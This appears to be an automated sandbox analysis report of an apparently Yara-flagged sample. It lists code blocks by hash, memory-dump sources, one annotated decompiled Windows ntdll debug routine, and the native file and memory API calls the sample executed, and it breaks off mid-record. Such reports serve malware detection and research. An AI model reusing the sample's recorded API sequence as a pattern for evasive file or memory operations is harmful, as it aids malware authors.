                                                                        • Instruction ID: 9f5c89698fc89826c9fee84e91529962bdb671f2a85dd3a5557a5cb31ae60069
                                                                        • Opcode Fuzzy Hash: a4e4bf7a11cb8b54cb1afd279b96ece4d911d0a0e9b76a0b7a03511da7c90d9e
                                                                        • Instruction Fuzzy Hash: 5C90026160514802E140B159541870600559BD0641F55D011A0015558DC7998A5576E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3b8ae7f94985a99ae788bee1878060ed40edcac215e61ade2eac48453d53477
                                                                        • Instruction ID: 379ec2714cea0b26ae73d5c71cb61d04d815b57d019eadb4fbc99525641c3882
                                                                        • Opcode Fuzzy Hash: a3b8ae7f94985a99ae788bee1878060ed40edcac215e61ade2eac48453d53477
                                                                        • Instruction Fuzzy Hash: 4090026120518842E100A5595408A0600459BD0645F55D011A1055599DC7758851B171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7717a22aa61ea10141bdcf83e584c3ecab6aa3576260fbfb2881ef8d35efea08
                                                                        • Instruction ID: 49c157856c26f984f2d7576ac8666854e8464e55beee8f4f870eb8e946ac238b
                                                                        • Opcode Fuzzy Hash: 7717a22aa61ea10141bdcf83e584c3ecab6aa3576260fbfb2881ef8d35efea08
                                                                        • Instruction Fuzzy Hash: 0190027520518842E500A5595804A8700459BD0745F55D411A041559CD87948861B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2edbb99074eb1d827023ddc6b32ff0de55ddea3641dc45c8bbacf35f44230e0a
                                                                        • Instruction ID: 652aa14433173fb68629ec20efa33bf9ab79c4ee750b2a116046fafe961308d4
                                                                        • Opcode Fuzzy Hash: 2edbb99074eb1d827023ddc6b32ff0de55ddea3641dc45c8bbacf35f44230e0a
                                                                        • Instruction Fuzzy Hash: D990047130114C03F100F15D550C7070045DFD0741F55D411F041555CDD7D7CC517171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6027c519841b305510332cf2f0d1038429ea75c4c0045daac62a997cd746bfd1
                                                                        • Instruction ID: 6b6781b91bc6dd3432dccc58a70b48dacc44dd047409efab9f2696af2cb834b4
                                                                        • Opcode Fuzzy Hash: 6027c519841b305510332cf2f0d1038429ea75c4c0045daac62a997cd746bfd1
                                                                        • Instruction Fuzzy Hash: B690027120114C42E100A1594404B4600459BE0741F55C016A0115658D8755C8517561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5238728e7cacdcea9eebb116e078f0436fb20119a9f6a059aafe9a88704cf684
                                                                        • Instruction ID: f3ab45de6fafde4227c4e3bddff3d813e3dc9f1ef7d3c55847919def28e3e5a1
                                                                        • Opcode Fuzzy Hash: 5238728e7cacdcea9eebb116e078f0436fb20119a9f6a059aafe9a88704cf684
                                                                        • Instruction Fuzzy Hash: 9F90027160514C02E150B159441474600459BD0741F55C011A0015658D87958A5576E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 364fa4383636e45811178b8355cb85b4fc09bbc1a09ae72d8728a6f1022bcff2
                                                                        • Instruction ID: 8c2e4bc43b2f4c13a4845710d7ab13d100a2eab06d272934d5d22961f21c8470
                                                                        • Opcode Fuzzy Hash: 364fa4383636e45811178b8355cb85b4fc09bbc1a09ae72d8728a6f1022bcff2
                                                                        • Instruction Fuzzy Hash: C090027120518C42E140B1594404A4600559BD0745F55C011A0055698D97658D55B6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bc4b9b5566eb98a67f5cf53b690430cf51b46213085127d2fb988b10ead51b95
                                                                        • Instruction ID: e931f4d1a8b09bd0e919da9625256847439cf55c0a9c9a0e3731d6c3e9a2b674
                                                                        • Opcode Fuzzy Hash: bc4b9b5566eb98a67f5cf53b690430cf51b46213085127d2fb988b10ead51b95
                                                                        • Instruction Fuzzy Hash: D090027120114C02E104A159480468600459BD0741F55C011A6015659E97A588917171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 97a0b2251db77544e55d3c0badd5aa66ab8594da76614621afecd88626a20d27
                                                                        • Instruction ID: 96acdb5ca87e2c2ab96d23594f372d83d78710719dd561ca7a0402b0863dce7b
                                                                        • Opcode Fuzzy Hash: 97a0b2251db77544e55d3c0badd5aa66ab8594da76614621afecd88626a20d27
                                                                        • Instruction Fuzzy Hash: 3D900271A0514412A140B15948146464046ABE0B81B59C011A0505558C8A948A5563E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d329c49b0f84dc6bb337bb798cf10da90b8e4837820bac7c190279dbcebcf05e
                                                                        • Instruction ID: 59b983c4b2f0b841b94fddceac5fd7b4dfcde636ddd8020c215498ac65443fe1
                                                                        • Opcode Fuzzy Hash: d329c49b0f84dc6bb337bb798cf10da90b8e4837820bac7c190279dbcebcf05e
                                                                        • Instruction Fuzzy Hash: DC9002E1201284925500E2598404B0A45459BE0641B55C016E1045564CC6658851A175
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d89536c2ea37f6a65a64cb0417be1aeeb58ef53d933a4dd5f57ed0456e39cb95
                                                                        • Instruction ID: 5be161f689c4c97c7dca16b2b66d4831ef61b8a443e8ae98123c51f9eb392964
                                                                        • Opcode Fuzzy Hash: d89536c2ea37f6a65a64cb0417be1aeeb58ef53d933a4dd5f57ed0456e39cb95
                                                                        • Instruction Fuzzy Hash: 56900265221144021145E559060450B0485ABD6791395C015F1407594CC76188656361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction ID: 72da9751f39bf5ef4294f02ca5d446bd00af85908dd1f4ab67f9f9eb6e4fca30
                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

C-Code - Quality: 53%
			E039BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;                                   /* __edx points at the 64-bit timeout (LARGE_INTEGER) */
				_push(_a4);
				_t14 =  *[fs:0x18];                             /* NT_TIB.Self: the current thread's TEB (x86) */
				_t15 = _t12;                                    /* _t12 is never assigned in this listing: the critical section pointer arrives in a register the decompiler did not resolve */
				/* 64-bit division of the relative timeout (100 ns units) by 0xFFFFFFFF_FF676980 = -10,000,000, giving seconds */
				_t7 = E0396CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				/* 0x65 = 101 = DPFLTR_RTL_ID; the (ComponentId, Level, Format, ...) shape is that of DbgPrintEx */
				E039B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;                                   /* RTL_CRITICAL_SECTION.DebugInfo */
				if(_t9 == 0xffffffff) {
					_t10 = 0;                                   /* no debug info: report ContentionCount 0 */
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));         /* RTL_CRITICAL_SECTION_DEBUG.ContentionCount */
				}
				_push(_t10);
				_push(_t15);                                    /* the critical section itself */
				_push( *((intOrPtr*)(_t15 + 0xc)));             /* RTL_CRITICAL_SECTION.OwningThread */
				_push( *((intOrPtr*)(_t14 + 0x24)));            /* TEB.ClientId.UniqueThread */
				/* last argument is TEB.ClientId.UniqueProcess, i.e. the "Pid" of "Pid.Tid" */
				return E039B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

Instruction addresses mapped to the lines above (decompiler line map): 0x039bfdda, 0x039bfde2, 0x039bfde5, 0x039bfdec, 0x039bfdfa, 0x039bfdff, 0x039bfe0a, 0x039bfe0f, 0x039bfe17, 0x039bfe1e, 0x039bfe19, 0x039bfe19, 0x039bfe19, 0x039bfe20, 0x039bfe21, 0x039bfe22, 0x039bfe25, 0x039bfe40

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 039BFDFA
                                                                        Strings
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039BFE2B
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039BFE01
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: 4675666a090f5f9479214b10e963286fc72762707615f536c982c14f9bb2de04
                                                                        • Instruction ID: 6856ba4325b5a988181305992dcaabd894b81289bfb9b1a3bbf21ff851475307
                                                                        • Opcode Fuzzy Hash: 4675666a090f5f9479214b10e963286fc72762707615f536c982c14f9bb2de04
                                                                        • Instruction Fuzzy Hash: C8F0C236240201BFDA219A89DD02E67BB6AEB85770F150214F6685A1D1DA62B83086A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        APIs
                                                                        • NtClose.NTDLL(0=b,?,?,00623D30,00000000,FFFFFFFF), ref: 00628315
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID: 0=b$];b
                                                                        • API String ID: 3535843008-3122864308
                                                                        • Opcode ID: 3143c59466556592eb98aba46643c6d922b395ceb151f34d36385954ee54d7f4
                                                                        • Instruction ID: 8b8ffe42f74c9fa03d1b4db22f10c44f360952c3a69a867dbba2d21ef1158640
                                                                        • Opcode Fuzzy Hash: 3143c59466556592eb98aba46643c6d922b395ceb151f34d36385954ee54d7f4
                                                                        • Instruction Fuzzy Hash: 7DF0FF752016247FD714EF98DC89ED777A9EF48750F158899FA1C5B292DA30FA008AE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00623B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00623B97,007A002E,00000000,00000060,00000000,00000000), ref: 0062820D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: d1406c367c3966fcfff6a4a5ce4105cd283d0cc049c22259a514cbaad3e75b7c
                                                                        • Instruction ID: adbabd8bbb9dee9087cd413a44d8a1d5673128d80319c8dc207d14e4ec421ae1
                                                                        • Opcode Fuzzy Hash: d1406c367c3966fcfff6a4a5ce4105cd283d0cc049c22259a514cbaad3e75b7c
                                                                        • Instruction Fuzzy Hash: 8901B2B2201148AFDB48CF98DC94EEB77A9AF8C754F158648FA0D97281C630EC11CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00623B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00623B97,007A002E,00000000,00000060,00000000,00000000), ref: 0062820D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction ID: 38f1cf4ed44bfde3711778ce4789ec2b761eee6327883547eebfcf9dc38acbf1
                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction Fuzzy Hash: B4F0B6B2201108AFCB48CF88DC85DEB77ADAF8C754F158648FA0D97241C630E8118BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtClose.NTDLL(0=b,?,?,00623D30,00000000,FFFFFFFF), ref: 00628315
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID: 0=b
                                                                        • API String ID: 3535843008-310277192
                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction ID: fe9bce4a573c2e43881b5c2319c0c259093f126564660dbab9c2e58c590c1a2e
                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction Fuzzy Hash: D3D012752002146BD710EF98DC45E97775DEF44750F154459BA185B282C930F90086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtReadFile.NTDLL(?,?,FFFFFFFF,00623A11,?,?,?,?,00623A11,FFFFFFFF,?,R=b,?,00000000), ref: 006282B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction ID: 40b1261690b6dc9bde5d79caa465777422ef5dba1f40b8b8b89e8759dc7540f3
                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction Fuzzy Hash: 8BF0A4B2200208AFCB14DF89DC81EEB77ADAF8C754F158648BA1D97241DA30E8118BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00612D11,00002000,00003000,00000004), ref: 006283D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 276487de27036f447431db30dbe3768bd69423c6ef43ef343d85c74857be37cb
                                                                        • Instruction ID: c64c6f8029bb8eefe23cb8906d91dffb21bd8dc29408eaa6358da2cd89eecf3c
                                                                        • Opcode Fuzzy Hash: 276487de27036f447431db30dbe3768bd69423c6ef43ef343d85c74857be37cb
                                                                        • Instruction Fuzzy Hash: 27F0FE71200118ABCB14DF89DC81EE777A9EF88350F118559FE5997241C630E915CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00612D11,00002000,00003000,00000004), ref: 006283D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction ID: 1306b8c495f1aa9dc0e3315e7f48d4a6df0384c1655b44a61734f8cae5edbede
                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction Fuzzy Hash: D7F015B2200218AFCB14DF89DC81EAB77ADAF88750F118548FE0897281CA30F810CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
• Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 91b47f8a9aaad9f4ab6454e7c137e7b923ddd427f6217aebff60f650fa631a57
                                                                        • Instruction ID: 4a55a5350cec07fcc5f15b7fa3b6fae7ec5631b62d0380ea2229e667a55bddb6
                                                                        • Opcode Fuzzy Hash: 91b47f8a9aaad9f4ab6454e7c137e7b923ddd427f6217aebff60f650fa631a57
                                                                        • Instruction Fuzzy Hash: 92900261242041677586B15944145474046E7E0285791C522A2909A70CC566F85AE6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b5510724e1c233651a0dd918041d5df8aa100af11b3c1de4c815506426854f87
                                                                        • Instruction ID: 5d6fce4f5a0c847ccccca83df8c6cd83f0dc236824457d7fdb927a96a3687bf7
                                                                        • Opcode Fuzzy Hash: b5510724e1c233651a0dd918041d5df8aa100af11b3c1de4c815506426854f87
                                                                        • Instruction Fuzzy Hash: 6290027120100427F152615945147470049D7D0285F91C922A1919678DD696E956B1A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 30e9eb96b9778ae4e53b6296a79d88ac4dacf4241f5afce2013247901d24fb53
                                                                        • Instruction ID: 39c2ea12f90cb8925bfd13d6028c1cb1659d9e1351c2f18d743ce9727445e0b6
                                                                        • Opcode Fuzzy Hash: 30e9eb96b9778ae4e53b6296a79d88ac4dacf4241f5afce2013247901d24fb53
                                                                        • Instruction Fuzzy Hash: E89002A134100457F14161594424B460045D7E1345F51C525E2559674DC659EC5671A6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 40d325c03237ec42e9d468d3a6ed948e0e05be89f419cb933fb1338fa7ff903d
                                                                        • Instruction ID: 53ae6dcb196823448fdcacda62cb2700f0de80213a1db3696a0ab7c824c0229f
                                                                        • Opcode Fuzzy Hash: 40d325c03237ec42e9d468d3a6ed948e0e05be89f419cb933fb1338fa7ff903d
                                                                        • Instruction Fuzzy Hash: FE9002A120200017614671594424656404AD7E0245B51C531E25096B0DC565E89571A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 307df9fd2eefe9d63d947b44055390ea62388724cedd5dc6e3c3f51a09f1dd40
                                                                        • Instruction ID: 12271ba6536dc88f61c54c3666cd6df4e901501cfbf79521280617c4500e7be3
                                                                        • Opcode Fuzzy Hash: 307df9fd2eefe9d63d947b44055390ea62388724cedd5dc6e3c3f51a09f1dd40
                                                                        • Instruction Fuzzy Hash: 479002B120100417F181715944147860045D7D0345F51C521A6559674EC699EDD976E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 3f93949741a707202fbc55c40e9b3d3d6a2fe0ac2e0f65cc4e73ea97c9bb0b1a
                                                                        • Instruction ID: 3e74eb3ca0fbdfed8630a37834d794f25c20f2e7730cd0bbc935ba883e08d33b
                                                                        • Opcode Fuzzy Hash: 3f93949741a707202fbc55c40e9b3d3d6a2fe0ac2e0f65cc4e73ea97c9bb0b1a
                                                                        • Instruction Fuzzy Hash: AA900265211000172146A55907145470086D7D5395351C531F250A670CD661E86561A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c8bb80764dc1d2f27fc8e3757c03163575eb4c2ee3e996a33e8859006944ebda
                                                                        • Instruction ID: 95cfe094f09bd37ca383e85ea5ca8c3da7910311da2d6b89b1f28c273d105912
                                                                        • Opcode Fuzzy Hash: c8bb80764dc1d2f27fc8e3757c03163575eb4c2ee3e996a33e8859006944ebda
                                                                        • Instruction Fuzzy Hash: F390027120100857F14161594414B860045D7E0345F51C526A1619774DC655E85575A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e791600b31c65f271158bd8a5ce236a6b35951b165ede50208a6924a8b82ab4a
                                                                        • Instruction ID: b49335eb879485d13d5d553fc0f7199de62af41b4782302c740b8fb0246081f0
                                                                        • Opcode Fuzzy Hash: e791600b31c65f271158bd8a5ce236a6b35951b165ede50208a6924a8b82ab4a
                                                                        • Instruction Fuzzy Hash: 0090027120108817F1516159841478A0045D7D0345F55C921A5919778DC6D5E89571A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6c1b181fa2a7b8550dc3fa4ec7588981991c7624b529c3c2b20e708081e3e135
                                                                        • Instruction ID: 2a0e74894ce257b4abb000e48bdae7fd2f5afc32c0b5246acd1f4f644a2398d9
                                                                        • Opcode Fuzzy Hash: 6c1b181fa2a7b8550dc3fa4ec7588981991c7624b529c3c2b20e708081e3e135
                                                                        • Instruction Fuzzy Hash: 5090027120504857F18171594414A860055D7D0349F51C521A15597B4DD665ED59B6E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 02cfcbe0c965cba729053762a0ed78bb40c1124eb9d7cddb7e03ce5220dd1a5a
                                                                        • Instruction ID: 0e6789e3795b906c913009027fafb3113e8f58e5f348080930d960fab5225536
                                                                        • Opcode Fuzzy Hash: 02cfcbe0c965cba729053762a0ed78bb40c1124eb9d7cddb7e03ce5220dd1a5a
                                                                        • Instruction Fuzzy Hash: 2190026121180057F24165694C24B470045D7D0347F51C625A1649674CC955E86565A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 757e69e53c19375e7b38d73c382097650b9ad573f0673c20a44de219923050da
